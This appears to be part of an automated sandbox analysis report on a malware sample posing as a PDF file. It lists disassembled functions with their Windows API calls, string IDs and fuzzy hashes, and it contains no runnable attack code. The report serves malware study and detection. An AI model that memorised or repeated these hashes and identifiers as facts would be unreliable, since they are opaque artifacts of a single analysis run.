                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume
                              • String ID: \VH
                              • API String ID: 2507767853-234962358
                              • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                              • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                              • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                              • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                              Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume
                              • String ID: \VH
                              • API String ID: 2507767853-234962358
                              • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                              • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                              • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                              • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                              Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                              • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: msctls_trackbar32
                              • API String ID: 3850602802-1010561917
                              • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                              • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                              • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                              • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                              Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                              • String ID: crts
                              • API String ID: 943502515-3724388283
                              • Opcode ID: bb55a0f27b70020379d424393c702af5b2eb225910e2ba3c7e40a194fe15662c
                              • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                              • Opcode Fuzzy Hash: bb55a0f27b70020379d424393c702af5b2eb225910e2ba3c7e40a194fe15662c
                              • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                              Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                              • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                              • SetErrorMode.KERNEL32(?), ref: 0045D35C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$LabelVolume
                              • String ID: \VH
                              • API String ID: 2006950084-234962358
                              • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                              • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                              • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                              • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                              Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetMenuItemInfoW.USER32 ref: 00449727
                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                              • DrawMenuBar.USER32 ref: 00449761
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$InfoItem$Draw_malloc
                              • String ID: 0
                              • API String ID: 772068139-4108050209
                              • Opcode ID: 08c999079c9288da8331d921eb98ebfa6b916f44b48ff73f34ad091df02caad3
                              • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                              • Opcode Fuzzy Hash: 08c999079c9288da8331d921eb98ebfa6b916f44b48ff73f34ad091df02caad3
                              • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                              Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$_wcscpy
                              • String ID: 3, 3, 8, 1
                              • API String ID: 3469035223-357260408
                              • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                              • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                              • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                              • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                              Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                              • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpCloseHandle
                              • API String ID: 2574300362-3530519716
                              • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                              • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                              • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                              • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                              Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpCreateFile
                              • API String ID: 2574300362-275556492
                              • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                              • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                              • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                              • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                              Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpSendEcho
                              • API String ID: 2574300362-58917771
                              • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                              • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                              • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                              • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                              Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: RegDeleteKeyExW$advapi32.dll
                              • API String ID: 2574300362-4033151799
                              • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                              • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                              • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                              • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                              Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                              • __itow.LIBCMT ref: 004699CD
                                • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                              • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                              • __itow.LIBCMT ref: 00469A97
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$__itow
                              • String ID:
                              • API String ID: 3379773720-0
                              • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                              • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                              • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                              • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                              Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                              Download Yara Rule
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00449A4A
                              • ScreenToClient.USER32(?,?), ref: 00449A80
                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$ClientMoveRectScreen
                              • String ID:
                              • API String ID: 3880355969-0
                              • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                              • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                              • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                              • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                              Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                              • String ID:
                              • API String ID: 2782032738-0
                              • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                              • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                              • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                              • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                              Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                              Download Yara Rule
                              APIs
                              • ClientToScreen.USER32(00000000,?), ref: 0044169A
                              • GetWindowRect.USER32(?,?), ref: 00441722
                              • PtInRect.USER32(?,?,?), ref: 00441734
                              • MessageBeep.USER32(00000000), ref: 004417AD
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Rect$BeepClientMessageScreenWindow
                              • String ID:
                              • API String ID: 1352109105-0
                              • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                              • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                              • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                              • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                              Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                              • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                              • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateHardLink$DeleteErrorFileLast
                              • String ID:
                              • API String ID: 3321077145-0
                              • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
